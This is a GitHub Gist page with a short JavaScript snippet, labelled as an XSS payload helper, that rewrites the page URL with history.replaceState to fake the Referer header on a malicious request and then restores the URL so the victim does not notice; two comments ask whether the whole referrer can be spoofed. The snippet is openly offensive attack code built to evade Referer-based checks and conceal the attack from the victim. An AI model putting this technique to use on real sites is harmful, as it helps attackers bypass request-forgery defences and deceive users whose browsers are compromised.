Last active
May 8, 2024 10:01
-
-
Save hoodoer/c4eb12b99d5902119fb30e8343b5b228 to your computer and use it in GitHub Desktop.
Code Snippet to Set 'Referer' Header using JavaScript (e.g. XSS Payload)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Save the current URL path to restore after making | |
| // malicious request with faked referer header value | |
| var savedPath = window.location.pathname; | |
| var savedSearch = window.location.search; | |
| // Change URL/History to control the referer header value | |
| // Swap out "/this-is-my-fake-referer-value" to be what you need | |
| window.history.replaceState(null, '', '/this-is-my-fake-referer-value'); | |
| // Send malicious request with faked referer header value | |
| // NOTE: this assumes you're using some xhr request, adjust | |
| // based on whatever your XSS payload is actually doing | |
| xhr.send(body); | |
| // Restore the URL value to the original one before | |
| // the XSS victim notices their location bar changed | |
| window.history.replaceState(null, '', savedPath + savedSearch); |
Is it possible to change the entire referrer header? Not the "/this-is-my-fake-referer-value" part. Is it possible to change it like "http://referer.com"?
I'm afraid not, you can only control the relative path under the host.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Is it possible to change the entire referrer header? Not the "/this-is-my-fake-referer-value" part. Is it possible to change it like "http://referer.com"?